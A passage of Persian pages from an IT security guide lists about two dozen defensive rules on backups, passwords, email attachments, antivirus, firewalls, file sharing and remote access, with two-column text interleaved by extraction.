٢٠٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻈﻨﻮﻥ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻗﺮﺍﺭ ﺩﻫﻴﺪ. ﺳﺎﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ:
ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﻗﺎﻋﺪﺓ ﺧﺎﺹ ﺩﻳﮕﺮ ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ .۱
ﻭﺍﺟﺪ ﭼﻪ ﺩﺭﺟﻪﺍﻱ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ .ﺍﮔـﺮ ﻓﻜـﺮ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦﺗﺮ ﺍﺯ ﺭﺍﻳﺎﻧﻪ
ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ ﻭ
ﻗﺎﻋﺪﺓ .۱ﭘــﻴﺶ ﺍﺯ ﻭﻗــﻮﻉ ﺳــﺮﻗﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺭ ﻣــﻮﺭﺩ ﺁﻥ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺩﭼﺎﺭ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ
ﺑﻴﺎﻧﺪﻳﺸﻴﺪ. ﺧﻮﺍﻫﻴﺪ ﺷﺪ ،ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻭﻟﻮﻳـﺖ ﻛـﺎﻓﻲ
ﻗﺎﻋﺪﺓ .۲ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﻣﻄﻤـﺌﻦ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺍﮔﺮ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑـﺮﻭﺯ ﻣـﺸﻜﻼﺕ
ﺷﻮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻬﺪﻳﺪ ﻓﻴﺰﻳﻜﻲ ﺭﺍﻳﺎﻧﻪ ،ﺑـﻪ ﺁﻧﻬـﺎ ﺍﻣﻨﻴﺘﻲ ،ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ ﭘﺮﻛـﺎﺭ ﻛـﻪ ﻫـﻴﭻ ﺁﻣـﻮﺯﺵ
ﺁﺳﻴﺒﻲ ﻭﺍﺭﺩ ﻧﻤﻲﺷﻮﺩ ﻭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ. ﺭﺳﻤﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﻧﺪﻳﺪﻩ ﺍﺳﺘﻔﺎﺩﺓ ﭘﺎﺭﻩﻭﻗـﺖ ﻛﻨﻴـﺪ،
ﺑﺪﻭﻥ ﺷﻚ ﺑﻪ ﺍﺳﺘﻘﺒﺎﻝ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻓﺘﻪﺍﻳﺪ.
ﻗﺎﻋﺪﺓ .۳ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﺍﻧﺘﺨــﺎﺏ ﻛﻨﻴــﺪ ﻛــﻪ
ﺑﺴﺎﺩﮔﻲ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳـﺎﺩ ﺑﻴﺎﻭﺭﻳـﺪ ﺍﻣـﺎ ﺣـﺪﺱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﺁﻣﻮﺯﺵ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺭﻭﺍﻟﻬـﺎ .۲
ﺯﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﻣﺸﻜﻞ ﺑﺎﺷﺪ. ﺩﺧﺎﻟﺖ ﺩﻫﻴﺪ .ﺁﻳـﺎ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ
ﻧﺎﺷﻲ ﺍﺯ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ )ﻭ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻋﻤﻠﻜﺮﺩﻫـﺎﻳﻲ ﺍﺯ ﻧﻈـﺮ
ﻗﺎﻋﺪﺓ .۴ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺧﻮﺩ ﺭﺍ ﻫﻤﻮﺍﺭﻩ
ﺍﻣﻨﻴﺘﻲ ﺿﻌﻴﻒ ﻫﺴﺘﻨﺪ( ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧـﺪ؟ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺻـﻮﺭﺕ
ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻣﻮﺭﺩ ﻏﻴﺮﻋﺎﺩﻱ ﻳﺎ ﻣﺸﻜﻮﻙ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ
ﻗﺎﻋﺪﺓ .۵ﺑﺮﻧﺎﻣــﺔ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺧــﻮﺩ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﭼﻪ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﭼﻪ ﻛﺴﻲ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ .ﺗﻬﻴﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ
ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻨﻴــﺪ ﻛــﻪ ﺿــﻤﻴﻤﻪﻫــﺎ ١٩٦ﺭﺍ ﺑــﺼﻮﺭﺕ ﺁﻣﻮﺯﺷﻲ ﻣﻨﺎﺳﺐ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ
ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ. ﻗﺴﻤﺘﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺗـﺪﺍﻓﻌﻲ ﺷـﻤﺎ ﺗﺒـﺪﻳﻞ ﻛﻨـﺪ .ﻧﺎﺁﮔـﺎﻩ
ﻗﺎﻋﺪﺓ .۶ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﻧﻮﻉ ﺿﻤﻴﻤﺔ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ، ﻧﮕﻬﺪﺍﺷﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎ ﻭ ﻋﻤﻠﻜـﺮﺩ
ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ ﺳﻴﺴﺘﻢ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ﻧﻤﻲﮔﺮﺩﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ
ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ. ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﮕـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻣﻬﺎﺟﻤﺎﻥ ﻣﺼﻤﻢ ﺑﺎﺷﺪ.
196 Attachment
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٠٦
ﻗﺎﻋﺪﺓ .۱۵ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳـﻞ ١٩٩ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨﻴـﺪ ،ﺁﻧـﺮﺍ ﻗﺎﻋﺪﺓ .۷ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺿﻤﻴﻤﻪﺍﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﻳﻚ ﻏﺮﻳﺒﻪ ﺩﺭﻳﺎﻓﺖ
ﻏﻴﺮﻓﻌــﺎﻝ ﻛﻨﻴــﺪ .ﺍﮔــﺮ ﺍﺯ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳــﻞ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﻳﺪ ﺑﺎﺯ ﻧﻜﻨﻴﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻓﺎﻳـﻞ
ﻣــﻲﻛﻨﻴــﺪ ،ﻧﺎﻣﻬــﺎﻱ ﻛــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻣﺮﺑﻮﻃﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﺎﺷﺪ.
ﻣﺴﺘﺤﻜﻢ ﺑﺮﮔﺰﻳﻨﻴـﺪ ﻭ ﻣﺠﻮﺯﻫـﺎﻱ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺗـﺎ
ﻗﺎﻋﺪﺓ .۸ﺍﺯ ﮔﺸﻮﺩﻥ ﺿﻤﻴﻤﻪﺍﻱ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻳﻚ ﻓﺮﺩ ﺁﺷـﻨﺎ ﻭ
ﺣﺪﺍﻗﻞ ﻣﻤﻜﻦ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣـﻮﺭﺩ
ﻣﻄﻤﺌﻦ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻫﻢ ﭘﺮﻫﻴﺰ ﻛﻨﻴﺪ ،ﻣﮕـﺮ ﺁﻧﻜـﻪ
ﻧﻈﺮ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﮔﺎﻫﺎﻧﻪ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۱۶ﺍﮔﺮ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮﻱ ﻓﺎﻳﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ،
ﻗﺎﻋﺪﺓ .۹ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ
ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻔﻨﻨﻲ ١٩٧HTMLﺭﺍ ﭘـﺮﺩﺍﺯﺵ
ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ.
ﻧﻜﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ.
ﻗﺎﻋﺪﺓ .۱۷ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺁﻣـﺪ ﻭ ﻣﻔﻴـﺪ
ﻗﺎﻋﺪﺓ .۱۰ﺍﺯ ISPﺧﻮﺩ ﺑﭙﺮﺳﻴﺪ ﻛﻪ ﺁﻳﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ
ﺑﺎﺷﻨﺪ ،ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻣﺮﺍﻗﺒﺖ ﻭ ﺁﮔﺎﻫﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ
ﭘــﻴﺶ ﺍﺯ ﺗﺤﻮﻳــﻞ ﺑــﻪ ﺷــﻤﺎ ﺍﺯ ﻧﻈــﺮ ﻭﻳــﺮﻭﺱ ﻭ ﻳــﺎ
ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ.
ﻗﺎﻋﺪﺓ .۱۸ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻫﺒـﺮﻱ
ﻗﺎﻋﺪﺓ .۱۱ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻫﺎﻱ ﻭﺏ ﺍﻣﻜـﺎﻥ downloadﻭ ﺍﺟـﺮﺍﻱ
ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ -ﻣﺜﻞ ﻣﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ -ﺣﺘـﻲ
ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﺸﻜﻠـﺴﺎﺯ ﺑﺎﺷـﻨﺪ ﺭﺍ
ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻧﻴﺰ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺍﺯ ﺣـﺴﺎﺏ
ﻧﺪﻫﻴﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷـﻴﺪ ﭘﺎﻳﮕـﺎﻩ ﻣﺮﺑﻮﻃـﻪ
ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ.
ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۱۹ﺗﻤﺎﻡ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻳـﺎ
ﻗﺎﻋﺪﺓ .۱۲ﻧﻤﺎﻳﺶ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻛـﻪ ﻣـﺮﻭﺭ ﻣـﻲﻛﻨﻴـﺪ ﻭ
ﻛﺎﺭﺑﺮﺩ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ.
ﺁﺩﺭﺳﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻴﺪ ﺭﺍ ﻓﻌـﺎﻝ
ﻗﺎﻋﺪﺓ .۲۰ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳﺮﻭﺱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺍﺳﺖ ﻛﻨﻴﺪ .ﻫﻤﭽﻨـﻴﻦ ﻫﻨﮕـﺎﻡ ﻣـﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻧﺎﺁﺷـﻨﺎ
ﺭﺍ ﺑﻪ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺿـﺪﻭﻳﺮﻭﺱ ﻣﺠﻬـﺰ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺟـﺎﺯﺓ
ﺩﺭﻳﺎﻓﺖ ﻧﺸﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻧﻪ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﻫﻴﺪ.
ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﻤﺎﻳﻴﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ
ﻗﺎﻋﺪﺓ .۱۳ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ cookieﻫﺎ ﺗﺤﺖ ﭼﻪ ﺷﺮﺍﻳﻄﻲ ﺩﺭ
ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳـﺘﮕﺎﻩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ ﻭﺟـﻮﺩ ﻭﻳـﺮﻭﺱ،
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ .ﺍﮔﺮ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﺁﻧﻬـﺎ
ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ.
ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ
ﻗﺎﻋﺪﺓ .۲۱ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﺧـﺎﺹ ﺗﺤـﺖ ﻣﻲ ﻛﻨﻴﺪ( ،ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ
ﺗﻬﺎﺟﻢ ﻭﻳﺮﻭﺳﻬﺎ ﻗـﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ -ﻣﺜـﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻜﻨﻴﺪ.
ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ -ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ
ﻗﺎﻋﺪﺓ .۱۴ﭼﻨﺎﻧﭽﻪ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻭ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ
ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ﻓﺮﺳـﺘﺎﺩﻩ
ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻣﺪ ،ﭘـﺲ ﺍﺯ ﺍﺗﻤـﺎﻡ
ﻣﻲﺷﻮﻧﺪ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻧﻤﻲﺑﺎﺷﻨﺪ ﻭ ﺑﺮﺍﻱ ﮔﻴﺮﻧﺪﻩ
ﻛﺎﺭ ،ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ١٩٨ﺭﺍ ﭘـﺎﻙ ﻛﻨﻴـﺪ .ﺍﮔـﺮ ﻗـﺎﺩﺭ ﺑـﻪ
ﺧﻄﺮﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﻧﺪ.
ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ
ﻗﺎﻋﺪﺓ .۲۲ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ( ﺷـﺎﻳﺪ ﺑﻬﺘــﺮ ﺑﺎﺷـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻛــﺎﺭ
ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ،ﭼـﻪ ﺑـﺼﻮﺭﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﻭﻱ ﺁﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﭙﺮﻫﻴﺰﻳﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ
ﺗﻨﻬﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎ ﺩﺍﺩﻩﻫﺎ ﻛـﺎﺭ ﻛﻨﻨـﺪ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺟﺪﺍﮔﺎﻧــﻪ ﺑــﺮﺍﻱ ﻣﺤﺎﻓﻈــﺖ ﺍﺯ ﺗﻤــﺎﻡ
ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ.
ﻣﺎﺷﻴﻨﻬﺎﻱ Windowsﺑﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺯ
ﻗﺎﻋﺪﺓ .۲۳ﺍﮔﺮ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ
ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ NTFSﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ(
ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ، • ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ )ﺩﺭ ﺣﺎﻟﺖ ﺣـﺪﺍﻗﻠﻲ ،ﺷﻨﺎﺳـﺔ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ،ﻭ ﺗﻤﺎﻡ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﻣﻨﺎﺳﺐ( ﺗﺎ ﻣﺒـﺎﺩﺍ ﻣﻬﺎﺟﻤـﺎﻥ ﻧﻴـﺰ ﺍﺯ
ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻣـﻦ ﻛـﺮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﮕﺎﺭﺷــﻬﺎﻱ ﺟﺪﻳــﺪ ﺳﻴــﺴﺘﻢﻋﺎﻣﻠﻬــﺎ ﺁﺳــﺎﻧﺘﺮ ﺍﺯ ﻛﻨﻨﺪ.
ﻧﮕﺎﺭﺷﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۲۴ﺛﺒــﺖ ﮔﺰﺍﺭﺷــﺎﺕ ﺑــﺮﺍﻱ ﻋﻤﻠﻜﺮﺩﻫــﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ • ﺳﻴﺴﺘﻢ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﻣﻨﻄﻘـﻲ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ .ﺍﻳـﻦ
ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ. ﮔﺰﺍﺭﺷﺎﺕ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ
ﻱ ﻛﺎﺭﺗﻬــﺎﻱ
ﻱ ﻓﺎﻳﻠﻬــﺎﻱ ﺩﺍﺩﻩﺍ ﹺ
